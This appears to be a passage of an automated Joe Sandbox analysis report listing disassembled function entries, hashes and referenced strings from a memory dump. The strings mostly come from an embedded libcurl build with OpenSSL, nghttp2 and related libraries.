                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3212256427-0
                                                                                                                                                                                                                                                            • Opcode ID: c9ec0abf3a83059f75b153570486656e8915675d95d7f4cd67ecded6bb458de3
                                                                                                                                                                                                                                                            • Instruction ID: 8baefeb654ec15fef050d693ebe16b00f59b42788251b2f139dce58cbfe5f333
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9ec0abf3a83059f75b153570486656e8915675d95d7f4cd67ecded6bb458de3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3515965A292425FF7213F259C057777B985F91344F0D403AE8898B2C3EABADC65C3A3
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen
                                                                                                                                                                                                                                                            • String ID: ate$deflate$gzip$identity$tity
                                                                                                                                                                                                                                                            • API String ID: 39653677-1128341356
                                                                                                                                                                                                                                                            • Opcode ID: 923daf103babc20360e91bca223ac42391e9a4043166b85e556bf35000f0db51
                                                                                                                                                                                                                                                            • Instruction ID: e3ac94e25156b6a1a9196b9d7304e26a6ca4e8b39c023ae1175a2ff57fc04bc4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 923daf103babc20360e91bca223ac42391e9a4043166b85e556bf35000f0db51
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 143103A5A6074267DB25AF276C0771B72985F8071AF16403AEC0857342F3E8A734C2EF
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fgets$fclosefopenstrlentime
                                                                                                                                                                                                                                                            • String ID: Set-Cookie:
                                                                                                                                                                                                                                                            • API String ID: 2140967147-2427311273
                                                                                                                                                                                                                                                            • Opcode ID: ad6221933f333c4e73c9df044df11dd8c6d906655eb5447ba9d8862a97fde664
                                                                                                                                                                                                                                                            • Instruction ID: 142d530a7c95e6488529b85a24e4e3fb9ae3c93913107985fd34f703c75e5363
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad6221933f333c4e73c9df044df11dd8c6d906655eb5447ba9d8862a97fde664
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 405135B1914301ABEB205F29DE4579777B0AF80309F084538FD8A87262E775D868CB5B
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$timetolower
                                                                                                                                                                                                                                                            • String ID: %s:%d$Hostname in DNS cache was stale, zapped
                                                                                                                                                                                                                                                            • API String ID: 2483798501-2902227024
                                                                                                                                                                                                                                                            • Opcode ID: d20740611108252e8214c252ed65943bfd9f94854e8cf991a3cbf32d10233b6c
                                                                                                                                                                                                                                                            • Instruction ID: 9bd01b64a896b08f99ba18551a13cf6c119499581f18cefa013498faf38a7bf1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d20740611108252e8214c252ed65943bfd9f94854e8cf991a3cbf32d10233b6c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C414AB1A28342AFE720AE655C41A2B77E8DF40315F184139FC5986202FA74DD3DD7AA
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • VirtualProtect failed with code 0x%x, xrefs: 004B7AFA
                                                                                                                                                                                                                                                            • @, xrefs: 004B7AD8
                                                                                                                                                                                                                                                            • VirtualQuery failed for %d bytes at address %p, xrefs: 004B7B27
                                                                                                                                                                                                                                                            • Address %p has no image-section, xrefs: 004B7B3B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryVirtual
                                                                                                                                                                                                                                                            • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$@$Address %p has no image-section
                                                                                                                                                                                                                                                            • API String ID: 1804819252-1098444051
                                                                                                                                                                                                                                                            • Opcode ID: 2848a85fd1c8feaaa253a641d45b699337d40d398b69155097bf782ea385a89d
                                                                                                                                                                                                                                                            • Instruction ID: b0d4587a95454d0b77bc1a7217ecac984904b3038e82cd89e6cc43a77888560a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2848a85fd1c8feaaa253a641d45b699337d40d398b69155097bf782ea385a89d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC4173719083019FC710DF69D88469AFBE4FF98754F45892DD9889B311E374E904CFA5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$fputcfputsfwrite
                                                                                                                                                                                                                                                            • String ID: Warning:
                                                                                                                                                                                                                                                            • API String ID: 810330193-3119939844
                                                                                                                                                                                                                                                            • Opcode ID: 7849886589fbe4ce221ccb0b19a7553dd73ce238e73c5991d0fd55790018465a
                                                                                                                                                                                                                                                            • Instruction ID: c0ec2f32f4827eca610bec2d39367eb8492b04662019557ae3ac661bc896a740
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7849886589fbe4ce221ccb0b19a7553dd73ce238e73c5991d0fd55790018465a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0621A5F28143066FDB10BF24D88266AB7E4EB45704F04482DF94842212F276A968CB73
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpymemsetstrlen
                                                                                                                                                                                                                                                            • String ID: ----$----$----$----$----
                                                                                                                                                                                                                                                            • API String ID: 160209724-1149513683
                                                                                                                                                                                                                                                            • Opcode ID: d7a7a61ebbc5850d4529e0658cc4e1a6148a78f260cfedae3ebece0eb777e386
                                                                                                                                                                                                                                                            • Instruction ID: 1da2478a3580974117f00bb7c1a8fc9aa7f04a047677739c3eaf11a7f82b15ca
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7a7a61ebbc5850d4529e0658cc4e1a6148a78f260cfedae3ebece0eb777e386
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDD18AB1911701CBDB108F19D884B17BBF0BF44309F0846A8ED499B392E776E928CF96
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • strcmp.MSVCRT ref: 00235766
                                                                                                                                                                                                                                                            • calloc.MSVCRT ref: 00235787
                                                                                                                                                                                                                                                            • _fileno.MSVCRT ref: 002357BB
                                                                                                                                                                                                                                                            • ftell.MSVCRT ref: 002357D1
                                                                                                                                                                                                                                                            • _fstati64.MSVCRT(00000000,?), ref: 002357EE
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 002358CF
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 002358D8
                                                                                                                                                                                                                                                              • Part of subcall function 002522F0: _stati64.MSVCRT(00235779,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00252377
                                                                                                                                                                                                                                                              • Part of subcall function 002522F0: _access.MSVCRT ref: 00252387
                                                                                                                                                                                                                                                              • Part of subcall function 002522F0: strrchr.MSVCRT ref: 00252427
                                                                                                                                                                                                                                                              • Part of subcall function 002522F0: strrchr.MSVCRT ref: 00252438
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: freestrrchr$_access_fileno_fstati64_stati64callocftellstrcmp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3818478975-0
                                                                                                                                                                                                                                                            • Opcode ID: bfcfcc0c00a0165c143c495cc382844046f9fba3de4181eec75d7baef495f39f
                                                                                                                                                                                                                                                            • Instruction ID: ad517420b18df1249c9d2765c91d36e95b8c545a6a04b3f7b7c7fedfd761a436
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfcfcc0c00a0165c143c495cc382844046f9fba3de4181eec75d7baef495f39f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4241F8F1D1061167EB00AB25AC02B67B6A8AF44758F040539FC0ED7281F775E9748BE7
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • %zd data bytes written, xrefs: 0025051D
                                                                                                                                                                                                                                                            • Failed receiving HTTP2 data, xrefs: 002507F7
                                                                                                                                                                                                                                                            • Q, xrefs: 002506B4
                                                                                                                                                                                                                                                            • nghttp2_session_mem_recv() returned %zd:%s, xrefs: 002505F0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpy$memmove
                                                                                                                                                                                                                                                            • String ID: %zd data bytes written$Failed receiving HTTP2 data$Q$nghttp2_session_mem_recv() returned %zd:%s
                                                                                                                                                                                                                                                            • API String ID: 1283327689-1364855282
                                                                                                                                                                                                                                                            • Opcode ID: ced47f6ba69e632cff5f49480e8a6a2f3fa7d5bf8337659e61859b94731c69a8
                                                                                                                                                                                                                                                            • Instruction ID: 2d1f68de7b57a728716d81e2989ed05e0eb1ab4573cb165cbba914f3297cb8c7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ced47f6ba69e632cff5f49480e8a6a2f3fa7d5bf8337659e61859b94731c69a8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88D17C70624306EFD714DF14CC84BAAB7A8BF84305F144579EC598B251E771E8A8CF96
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 002530A0
                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000002), ref: 002530E4
                                                                                                                                                                                                                                                            • memmove.MSVCRT(?,?,?), ref: 0025319E
                                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000002,?,00000000,?,?,00000000,00252CAD,?), ref: 00253258
                                                                                                                                                                                                                                                            • fclose.MSVCRT ref: 0025331E
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpy$fclosememmovestrlen
                                                                                                                                                                                                                                                            • String ID: Content-Type
                                                                                                                                                                                                                                                            • API String ID: 3890074660-2058190213
                                                                                                                                                                                                                                                            • Opcode ID: 46b225d1add4df8243a45c427aff0ea5c12216af7189c5851c18b32b920ee7bc
                                                                                                                                                                                                                                                            • Instruction ID: 94177e61ec96c5de54eaf42578c1514750a79144ab6d9962a9bb4a961b9d96ce
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46b225d1add4df8243a45c427aff0ea5c12216af7189c5851c18b32b920ee7bc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A91CEB1528B0AAFD710DF65C844766B7E4FB04395F008529EC05C7680E7B1EE28CBD9
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strchr$strlen
                                                                                                                                                                                                                                                            • String ID: xn--
                                                                                                                                                                                                                                                            • API String ID: 842768466-2826155999
                                                                                                                                                                                                                                                            • Opcode ID: 2a9efbd9091acaa3f1951e29c56fd30cd3fffe45d32e84009c3c0ec04321420c
                                                                                                                                                                                                                                                            • Instruction ID: fcf2a57b72744d47b1a4e696a0cb8d889edc4521152509084ab9fe2023a38e56
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a9efbd9091acaa3f1951e29c56fd30cd3fffe45d32e84009c3c0ec04321420c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8410898A21B6267EB217A355D4AB6BB6CC8F41349F080038FD4AC52C3FA55D934C3B6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 00241B32
                                                                                                                                                                                                                                                              • Part of subcall function 00258AE0: memcpy.MSVCRT(?,OpenSSL/1.1.1a (Schannel),0000001A,?,?,?,?,00241C39,OpenSSL/1.1.1a (Schannel),00000050,0023EECE,00000004,?,?,?,00238BA3), ref: 00258B9B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpystrlen
                                                                                                                                                                                                                                                            • String ID: WinIDN$ brotli/$ libssh2/%s$ zlib/%s$%u.%u.%u$libcurl/7.64.0 OpenSSL/1.1.1a (Schannel) zlib/1.2.11 brotli/1.0.7 WinIDN libssh2/1.8.0 nghttp2/1.36.0
                                                                                                                                                                                                                                                            • API String ID: 3412268980-1275948520
                                                                                                                                                                                                                                                            • Opcode ID: 393cc0f910878044fa1dd0f20b11f292ad7e9cf8e5fa0ad3b485bc0331e7b870
                                                                                                                                                                                                                                                            • Instruction ID: 65e607f0c90dc52e8d9df310f6d57c529761f6ac1820bdb506eef7da7d14ad6a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 393cc0f910878044fa1dd0f20b11f292ad7e9cf8e5fa0ad3b485bc0331e7b870
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C212BF38102417BD31467755C1EBB73D9C8BA1748F05057AFC0462643FAAD15A9C3E6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
